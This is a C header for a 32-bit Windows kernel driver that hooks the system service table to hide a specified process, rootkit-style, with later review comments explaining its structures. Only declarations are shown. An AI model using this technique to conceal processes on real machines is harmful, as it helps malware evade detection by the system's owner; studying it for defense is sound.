/* ******************************************************************
File: ProcessHide.h
Hooks the system service table on 80x86 CPUs running Windows 2000 or later;
this driver is used to hide a specified process.
code by xicao from SEU (02/26/2006)
****************************************************************** */
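#pragma once /* the original had no include guard; this keeps double inclusion from redefining the tentative globals below */
/* extern "C" gives these declarations C linkage when the header is consumed
 * from C++; for a plain *.c consumer the block is compiled out. */
#ifdef __cplusplus
extern "C"
{
#endif
#include <stdarg.h>
#include <stdio.h>
/* Device type of the driver's control device. Third-party device types are
 * expected to lie at or above 0x8000 (values below are reserved for
 * Microsoft), so 0x9122 is in the allowed range. */
#define FILE_DEVICE_WINHOOK 0x00009122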
/* Native API process/thread structures as returned by ZwQuerySystemInformation
 * (undocumented layouts). Field order and types ARE the ABI: they must match
 * what the running kernel writes into the caller's buffer, so do not reorder
 * or retype members.
 * NOTE(review): these are the Win2K-era layouts the header targets; they are
 * not guaranteed to match later Windows versions -- confirm against the
 * target OS before reuse. */
struct _SYSTEM_THREADS
{
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG WaitTime;
PVOID StartAddress;
CLIENT_ID ClientIs;  /* sic: presumably meant "ClientId"; name kept, callers may reference it */
KPRIORITY Priority;
KPRIORITY BasePriority;
ULONG ContextSwitchCount;
ULONG ThreadState;
KWAIT_REASON WaitReason;
};
/* One entry of the SystemProcessInformation result buffer. Entries are
 * chained by NextEntryDelta (byte offset from this entry to the next one).
 * NOTE(review): the process-hiding hook presumably removes a process by
 * adjusting the previous entry's NextEntryDelta; whatever walks this list
 * must treat a zero delta as the terminator and handle the hidden process
 * being the last entry -- verify in the .c, which is not shown here. */
struct _SYSTEM_PROCESSES
{
ULONG NextEntryDelta;  /* byte offset to the next entry */
ULONG ThreadCount;
ULONG Reserved[6];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ProcessName;  /* image name; the hook presumably matches on this or on ProcessId */
KPRIORITY BasePriority;
ULONG ProcessId;
ULONG InheritedFromProcessId;
ULONG HandleCount;
ULONG Reserved2[2];
VM_COUNTERS VmCounters;
IO_COUNTERS IoCounters;//Windows 2000-specific (per the original comment)
struct _SYSTEM_THREADS Threads[1];  /* ThreadCount entries follow in memory; kept as [1] rather than a flexible array so sizeof matches the original layout */
};
/* In-memory layout of a system service descriptor table entry (what
 * KeServiceDescriptorTable points at on 32-bit x86). Field order is the ABI.
 * NOTE(review): the member names are this file's own. In the commonly
 * documented x86 layout the four words are the service-routine base, a
 * per-service counter table, the number of services, and the per-service
 * argument byte-count table -- so "LowCall"/"HiCall" should not be read as a
 * syscall-index range. Confirm against how the .c indexes ServiceTable and
 * bounds-checks against HiCall before trusting either name. */
typedef struct _SRVTABLE {
PVOID *ServiceTable;  /* array of service routine pointers; hooks overwrite entries here */
ULONG LowCall;
ULONG HiCall;
PVOID *ArgTable;
} SRVTABLE, *PSRVTABLE;
/* Saved pointer to the original ZwQuerySystemInformation service routine.
 * Presumably filled in when the hook is installed so the hook can chain to
 * the real implementation and the unhook can restore the table entry.
 * NOTE(review): this is a tentative definition, not an `extern` declaration,
 * so every translation unit that includes this header gets its own copy (or
 * a common symbol). The .c is not visible here, so it is left unchanged; the
 * proper fix is `extern` here plus exactly one definition in the .c. */
NTSTATUS (*RealZwQuerySystemInformation)(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength
);
/* Prototype of the native API ZwQuerySystemInformation, declared here because
 * the DDK headers of the targeted era do not expose it. The class parameter
 * is typed ULONG rather than SYSTEM_INFORMATION_CLASS, which is layout-
 * compatible but loses the enum's type checking. */
NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength
);
/* Saved pointer to the original ZwSetInformationFile service routine, used by
 * the hook to chain to the real implementation and by the unhook to restore
 * the table entry (the .c that fills it is not shown here).
 * NOTE(review): tentative definition in a header, same issue as
 * RealZwQuerySystemInformation -- should be `extern` with one definition in
 * the .c. */
NTSTATUS
(*RealZwSetInformationFile)(IN HANDLE FileHandle,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass);
/* Replacement for ZwSetInformationFile that is written into the service table.
 * NOTE(review): a service-table hook is reached directly from the syscall
 * path with the caller's PreviousMode, so the implementation (not shown)
 * must treat FileInformation, IoStatusBlock and Length as untrusted when the
 * caller is user mode -- probe/capture before dereferencing -- and must
 * forward to RealZwSetInformationFile with the arguments unchanged. Confirm
 * in the .c. */
NTSTATUS HookZwSetInformationFile(IN HANDLE FileHandle,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass);
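/* Install the system service table hooks: the Hook* routines declared in this
 * header replace the original table entries and the originals are saved in
 * the Real* pointers. HookAPI is a companion entry point whose relationship
 * to HookSystemCall is not visible in this header.
 * Declared with (void): an empty parameter list in C is an unprototyped
 * declaration and lets a caller pass arbitrary arguments unchecked. */
VOID HookSystemCall(void);
VOID HookAPI(void);
/* Remove the hooks and restore the saved original service table entries.
 * UnHook is the companion of HookAPI (see above). */
VOID UnhookSystemCall(void);
VOID UnHook(void);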
/* Replacement for ZwQuerySystemInformation that is written into the service
 * table. Presumably chains to RealZwQuerySystemInformation and, for the
 * process-list information class, unlinks the entry of the process to hide
 * from the returned _SYSTEM_PROCESSES chain.
 * NOTE(review): SystemInformation is the caller's buffer and may be a
 * user-mode pointer; the implementation (not shown) should only walk it
 * after the real call returned success, stay within
 * SystemInformationLength, and stop at a zero NextEntryDelta. Confirm in
 * the .c. */
NTSTATUS HookZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength
);
/* Driver entry point (required). Receives the driver object and the registry
 * service key path; presumably creates the FILE_DEVICE_WINHOOK control
 * device, sets DriverDispatch/DriverUnload and installs the hooks -- the
 * implementation is not shown here. */
NTSTATUS DriverEntry(
IN PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
);
/* IRP dispatch routine for the control device.
 * NOTE(review): any IOCTL that tells the driver which process to hide arrives
 * here from user mode; the implementation (not shown) should validate the
 * IOCTL code and the input buffer length before reading from it. */
NTSTATUS DriverDispatch(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp
);
/* Driver unload routine. Presumably removes the hooks (UnhookSystemCall /
 * UnHook) and deletes the control device; the hooks must be gone before the
 * driver image is unmapped or the service table points at freed code. */
VOID DriverUnload(
IN PDRIVER_OBJECT DriverObject
);
/* Pointer to the kernel's system service descriptor table, exported by
 * ntoskrnl.exe on 32-bit x86 (the target named in the file header); this
 * file's PSRVTABLE is its own view of that object's layout.
 * NOTE(review): on 64-bit Windows the symbol is not exported and patching
 * the table is blocked by kernel patch protection, so this technique is
 * limited to the 32-bit target as declared. */
extern PSRVTABLE KeServiceDescriptorTable;
#ifdef __cplusplus
}
#endif